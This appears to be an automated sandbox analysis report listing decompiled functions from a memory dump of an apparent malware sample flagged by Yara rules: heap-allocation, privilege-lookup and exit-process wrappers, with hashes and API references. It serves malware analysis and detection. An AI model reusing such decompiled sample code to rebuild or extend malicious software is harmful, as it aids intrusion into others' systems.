                                                          Function 004184C3, Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 53%
                                                          			E004184C3(void* __edx, intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				void* _v117;
				char _t12;
				void* _t19;

				asm("aas");
				asm("repne aad 0xa9");
				asm("in eax, dx");
				_t9 = _a4;
				_t5 = _t9 + 0xc74; // 0xc74
				L00418DC0(_t19, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t12 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t12;
			}






                                                          0x004184c3
                                                          0x004184c4
                                                          0x004184ce
                                                          0x004184d3
                                                          0x004184df
                                                          0x004184e7
                                                          0x004184fd
                                                          0x00418501

                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 2e62f55243c069a2d383d39422ca7254204f95d8ecccee7086d39a7c5616c67d
                                                          • Instruction ID: fa8e98aefead33b4ad2b43290c945b21301be2d8cc6ddb2f24b3ff36b4822937
                                                          • Opcode Fuzzy Hash: 2e62f55243c069a2d383d39422ca7254204f95d8ecccee7086d39a7c5616c67d
                                                          • Instruction Fuzzy Hash: 0BE06DB5500215AFC718DF55DC4AE9BB76CAF84300F118A9AF9085B291C631A814CAA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 004184D0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E004184D0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				L00418DC0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                          0x004184df
                                                          0x004184e7
                                                          0x004184fd
                                                          0x00418501

                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00408AF3,?,?,00408AF3,00000060,00000000,00000000,?,?,00408AF3,?,00000000), ref: 004184FD
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                          • Instruction ID: 0c1265b7fbf046cbfd36917309396888787f1b5b9f48543de1c0af89871077f5
                                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                          • Instruction Fuzzy Hash: 2EE01AB12002046BD714DF59DC45EA777ACAF88750F014559F90857241CA30E9108AB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00418490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00418490(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				L00418DC0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                          0x004184a7
                                                          0x004184bd
                                                          0x004184c1

                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00413516,?,00413C8F,00413C8F,?,00413516,?,?,?,?,?,00000000,00408AF3,?), ref: 004184BD
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                          • Instruction ID: d4cd8ba0fc8cb19801f053331f4cf649e26225416c3eadc5d6da7764d9533391
                                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                          • Instruction Fuzzy Hash: 81E012B1200208ABDB14EF99DC41EA777ACAF88654F118559FA085B282CA30F9108AB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00418630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00418630(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				L00418DC0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                          0x0041864a
                                                          0x00418660
                                                          0x00418664

                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                          • Instruction ID: a95af6b202be8dae21372797db95a078404a8f30fafd20f5c772dce95c9aa66f
                                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                          • Instruction Fuzzy Hash: 31E01AB12002086BDB10DF49DC85EE737ADAF89650F018559FA0857241CA34E8108BF5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00418510, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00418510(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				L00418DC0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                          0x00418513
                                                          0x0041852a
                                                          0x00418538

                                                          APIs
                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418538
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000001.215550153.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcess
                                                          • String ID:
                                                          • API String ID: 621844428-0
                                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                          • Instruction ID: 7205fd5e3e27dabd4e13006f85928de99448ffddaf0958f387cae24292a3a6f6
                                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                          • Instruction Fuzzy Hash: ACD012716003147BD620DF99DC85FD7779CDF49750F018469BA1C5B241C931BA0086E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B1967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 12fb9094e332aca5bd2c9ae3fb6b9b97e35cca9322bc65c6933af816ffd8bb54
                                                          • Instruction ID: 0c3215f39203223c24339349c43f41ea1b481762c0b720e6d1b8de0bdd65cf9e
                                                          • Opcode Fuzzy Hash: 12fb9094e332aca5bd2c9ae3fb6b9b97e35cca9322bc65c6933af816ffd8bb54
                                                          • Instruction Fuzzy Hash: 68B09B729015D5C5D711D76056087177940F7D0751F76C0A5D2060641A4778C4D1F5B5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Function 00406A95, Relevance: .0, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257156250.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: db7258001cee886dad1c17700cef2123638df1d5e441e5de0653215e65693d96
                                                          • Instruction ID: bc00b4f745960c86fc0b0837f44edcc9ab379ea7262dd83db2f04d1ef488ce98
                                                          • Opcode Fuzzy Hash: db7258001cee886dad1c17700cef2123638df1d5e441e5de0653215e65693d96
                                                          • Instruction Fuzzy Hash: 55D023329051504FC6255C18D49057DF394DB57230F045257CC9CB3141515DD44045C9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B198A0, Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 9a9c5042e839027f53ee0220f65cd49d58c420e3be21525708cdf3294fe2b5a4
                                                          • Instruction ID: d1f61a1f0826c297f3b4f88d779ae460630c90a6185e913c340da72a4c58cd02
                                                          • Opcode Fuzzy Hash: 9a9c5042e839027f53ee0220f65cd49d58c420e3be21525708cdf3294fe2b5a4
                                                          • Instruction Fuzzy Hash: 2F90026230101402D202615954146060049D7D1395FA1C066E5454555D86658963F172
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B19820, Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c1b8329fbaa9e2a14012a258e86c7db8fec8e48d6a06a227da707c2104ea673f
                                                          • Instruction ID: 569db728960dd894bb1af00b8df073242ffe7d4b5584b0f96bba3f736c7f5593
                                                          • Opcode Fuzzy Hash: c1b8329fbaa9e2a14012a258e86c7db8fec8e48d6a06a227da707c2104ea673f
                                                          • Instruction Fuzzy Hash: 8A90027224101402D241715954046060049E7D0391FA1C066A4454554E86958A67FAA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B1B040, Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: aba2861b228a858c42cca557aa2ad080113b5fb61b0817ff5a1a1f7d6a398ea9
                                                          • Instruction ID: 50a48cfe13d2cb22d8fd6f2c83fb7cfeed406dd0dfd33745ed1f265d3afdd162
                                                          • Opcode Fuzzy Hash: aba2861b228a858c42cca557aa2ad080113b5fb61b0817ff5a1a1f7d6a398ea9
                                                          • Instruction Fuzzy Hash: 919002A2601150434640B15958044065055E7E13513A1C175A4484560C86A88866E2A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B195F0, Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7710c4dca4dffbfb764f8a9eb6127162361329c6d1b4387b369dcc3972c514f2
                                                          • Instruction ID: 9fc2b72a0185a3b1edb09e80552e4ee6127d0e51746bc2a056ed56ae3ee4fb0a
                                                          • Opcode Fuzzy Hash: 7710c4dca4dffbfb764f8a9eb6127162361329c6d1b4387b369dcc3972c514f2
                                                          • Instruction Fuzzy Hash: 1D90027220101802D204615958046860045D7D0351F61C065AA054655E96A588A2B171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B199D0, Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7e24cfd02c4fcf4ac0d9f24754fb25339ee74f0ff4d480ba6f65b8f18c47ed1f
                                                          • Instruction ID: 6f13fbd29106bb8a34cbf4c991ed938039b17694a49eb4eb3dce3f004d45b424
                                                          • Opcode Fuzzy Hash: 7e24cfd02c4fcf4ac0d9f24754fb25339ee74f0ff4d480ba6f65b8f18c47ed1f
                                                          • Instruction Fuzzy Hash: 4E9002A221101042D204615954047060085D7E1351F61C066A6184554CC5698C72A165
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B1AD30, Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 321c1e1e77fbb45f7c5494613c8fc046b05183e427c03a51d7fe9730160d7233
                                                          • Instruction ID: 701a25843c05156c8105ba61d43a1cc2539607e5f94de8a632a73d45cda9ae55
                                                          • Opcode Fuzzy Hash: 321c1e1e77fbb45f7c5494613c8fc046b05183e427c03a51d7fe9730160d7233
                                                          • Instruction Fuzzy Hash: CB900272A05010129240715958146464046E7E0791B65C065A4544554C89948A66A3E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B19520, Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 8fe70099f71a86a4b9ea0bcb4848ae103ac8e9294c8da7110d0bbb54fa63e0cd
                                                          • Instruction ID: 8fac76a22ee0d0f2a624051eccd7de92a558d63bc5beff0480abd391dd690fd5
                                                          • Opcode Fuzzy Hash: 8fe70099f71a86a4b9ea0bcb4848ae103ac8e9294c8da7110d0bbb54fa63e0cd
                                                          • Instruction Fuzzy Hash: 7A9002E2201150924600A2599404B0A4545D7E0351B61C06AE5084560CC5658862E175
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B19560, Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e82f2cf93721a9dd47a704245525496c10637073d1eb2b1f513aee317149a855
                                                          • Instruction ID: b4df95846cebfd9ed82958b3dfb4a29e0193128da393a07eb2c58bdfb5ff7d91
                                                          • Opcode Fuzzy Hash: e82f2cf93721a9dd47a704245525496c10637073d1eb2b1f513aee317149a855
                                                          • Instruction Fuzzy Hash: D8900266221010020245A559160450B0485E7D63A13A1C069F5446590CC6618876A361
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B19950, Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c9f45aedbcbeaac2c083463d7b5a9f04d0f54317636cee4501df8f4fbd56a02f
                                                          • Instruction ID: d5dac0d0de899ae0a054fa6d593e412f8733831f7c3ba8f99474e8cd4b54b794
                                                          • Opcode Fuzzy Hash: c9f45aedbcbeaac2c083463d7b5a9f04d0f54317636cee4501df8f4fbd56a02f
                                                          • Instruction Fuzzy Hash: 159002A220141403D240655958046070045D7D0352F61C065A6094555E8A698C62B175
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B19A80, Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 621ba2fc84cd12c9c2e037f5e2124aa8fb87b121b18dd8159941761130134edc
                                                          • Instruction ID: 9c69a78628ff746e3d1181540bde0232b93256f3c937681fd77c034d2c141bb7
                                                          • Opcode Fuzzy Hash: 621ba2fc84cd12c9c2e037f5e2124aa8fb87b121b18dd8159941761130134edc
                                                          • Instruction Fuzzy Hash: FE90026220145442D24062595804B0F4145D7E1352FA1C06DA8186554CC9558866A761
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B196D0, Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 38ba3b72e3843a31899ce42909fec31e51280d4ec84d93df83943941f59ad404
                                                          • Instruction ID: bd95271ba52b0727cf5103fb14e4b63ba556527c545f9121800c4812b2e497f4
                                                          • Opcode Fuzzy Hash: 38ba3b72e3843a31899ce42909fec31e51280d4ec84d93df83943941f59ad404
                                                          • Instruction Fuzzy Hash: 8C90027220101842D20061595404B460045D7E0351F61C06AA4154654D8655C862B561
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B19A10, Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 78743be7e136b582f2a51e52cead8ad5c4f3ece80c3d6b2568f9dd7970c68b0f
                                                          • Instruction ID: 3d53ca2832130d757d3dd00e71f070f84a7731d9ae576a53f2e8334758dbac97
                                                          • Opcode Fuzzy Hash: 78743be7e136b582f2a51e52cead8ad5c4f3ece80c3d6b2568f9dd7970c68b0f
                                                          • Instruction Fuzzy Hash: 6590027220141402D200615958087470045D7D0352F61C065A9194555E86A5C8A2B571
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B19610, Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5d628b1071da4e190d81c7580e70f77a90bb8d2ecfb29a361fbcc337362be1f3
                                                          • Instruction ID: 8f7cf461df369404c90b61c88c1a225f3b6968fbcc00fe9aaeda96761e0c895f
                                                          • Opcode Fuzzy Hash: 5d628b1071da4e190d81c7580e70f77a90bb8d2ecfb29a361fbcc337362be1f3
                                                          • Instruction Fuzzy Hash: BA90027260501802D250715954147460045D7D0351F61C065A4054654D87958A66B6E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B19650, Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 37da43d97c99ab5693bc27deb9310b6010727bbf12d948c92a7c3ff34d5cccd5
                                                          • Instruction ID: bcfa2d3c86f402522076c547ff815ffd85be4ae883e8234d4cb7521bc2a0223c
                                                          • Opcode Fuzzy Hash: 37da43d97c99ab5693bc27deb9310b6010727bbf12d948c92a7c3ff34d5cccd5
                                                          • Instruction Fuzzy Hash: CD90027220505842D24071595404A460055D7D0355F61C065A4094694D96658D66F6A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B1A3B0, Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4770aead8f91ff68ba623f8065ca09d13208e25c395d68aeca8ab809c0b3fd38
                                                          • Instruction ID: f889f709246e2cdc42d769639b9ef382f05904cf78736c5a95b27794db9a8ebb
                                                          • Opcode Fuzzy Hash: 4770aead8f91ff68ba623f8065ca09d13208e25c395d68aeca8ab809c0b3fd38
                                                          • Instruction Fuzzy Hash: 1290027220145002D2407159944460B5045E7E0351F61C465E4455554C86558867E261
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B19730, Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 67312720f8308c2de271bab091dc28eb50fef309c22b28865be610fe51e0ff4d
                                                          • Instruction ID: 1bca6a9010ad2ae18c616617553fb475fd7c17fb9c47485b9dc961269aad979b
                                                          • Opcode Fuzzy Hash: 67312720f8308c2de271bab091dc28eb50fef309c22b28865be610fe51e0ff4d
                                                          • Instruction Fuzzy Hash: A990026260501402D240715964187060055D7D0351F61D065A4054554DC6998A66B6E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B1A710, Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e5a5ee435f7272439db35e1229153f47fb02263bb7e178248b327e400190a9fd
                                                          • Instruction ID: ed337d47fb915a4a2ff6a909b41e3e5108f3a55049479b067d50d5e7ea009236
                                                          • Opcode Fuzzy Hash: e5a5ee435f7272439db35e1229153f47fb02263bb7e178248b327e400190a9fd
                                                          • Instruction Fuzzy Hash: 5C900272301010529600A6996804A4A4145D7F0351B61D069A8044554C85948872A161
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B19B00, Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e54efed5c68c6ae55fd03ee402f4284b047e4c5197f25a55a21e6b275210e3d1
                                                          • Instruction ID: 71b4002038eab0014da4f1c6dd726621ddb8b20eedc6d004ecc4c70cfb15982c
                                                          • Opcode Fuzzy Hash: e54efed5c68c6ae55fd03ee402f4284b047e4c5197f25a55a21e6b275210e3d1
                                                          • Instruction Fuzzy Hash: 9A90026224101802D240715994147070046D7D0751F61C065A4054554D86568976B6F1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B19770, Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 278c820434238fbb31643024145e5e6e45da28b24eb35aeed290c26e246ec6db
                                                          • Instruction ID: f3526e81a82497404a6cb9d2483da17108898e73a6fbafdd1628a663a87e54bc
                                                          • Opcode Fuzzy Hash: 278c820434238fbb31643024145e5e6e45da28b24eb35aeed290c26e246ec6db
                                                          • Instruction Fuzzy Hash: CD90026220505442D20065596408A060045D7D0355F61D065A5094595DC6758862F171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B1A770, Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fd67235b229e63b79de0ecf3d413f8621644b91a381be3b442d6b095414ca8cb
                                                          • Instruction ID: 467f360ce14fd5b74dae489610c6b39c32bb70f8ad835b7c7fd40a5fb28c685c
                                                          • Opcode Fuzzy Hash: fd67235b229e63b79de0ecf3d413f8621644b91a381be3b442d6b095414ca8cb
                                                          • Instruction Fuzzy Hash: 0A90027620505442D60065596804A870045D7D0355F61D465A445459CD86948872F161
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B19760, Relevance: .0, Instructions: 4COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1229cd7e40c36d877fbb9fa13d2bd941af84eb6017a146e5ea70d494ea5c857c
                                                          • Instruction ID: 7f462de4ae49f3f5178ce0e7846c0b46e699a8a4746bd24e912bf46adc43583d
                                                          • Opcode Fuzzy Hash: 1229cd7e40c36d877fbb9fa13d2bd941af84eb6017a146e5ea70d494ea5c857c
                                                          • Instruction Fuzzy Hash: FE90027220101403D200615965087070045D7D0351F61D465A4454558DD6968862B161
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B19670, Relevance: .0, Instructions: 2COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.257465444.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                          • Instruction ID: 6543777ceaf0fd68972e27952e81246fdb243592efeac8130102c3b41dfda658
                                                          • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                          • Instruction Fuzzy Hash:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00B6FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 53%
                                                          			E00B6FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E00B1CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E00B65720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E00B65720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                          0x00b6fdda
                                                          0x00b6fde2
                                                          0x00b6fde5
                                                          0x00b6fdec
                                                          0x00b6fdfa
                                                          0x00b6fdff
                                                          0x00b6fe0a
                                                          0x00b6fe0f
                                                          0x00b6fe17
                                                          0x00b6fe1e
                                                          0x00b6fe19
                                                          0x00b6fe19
                                                          0x00b6fe19
                                                          0x00b6fe20
                                                          0x00b6fe21
                                                          0x00b6fe22
                                                          0x00b6fe25
                                                          0x00b6fe40

                                                          APIs
                                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B6FDFA
                                                          Strings
                                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00B6FE01
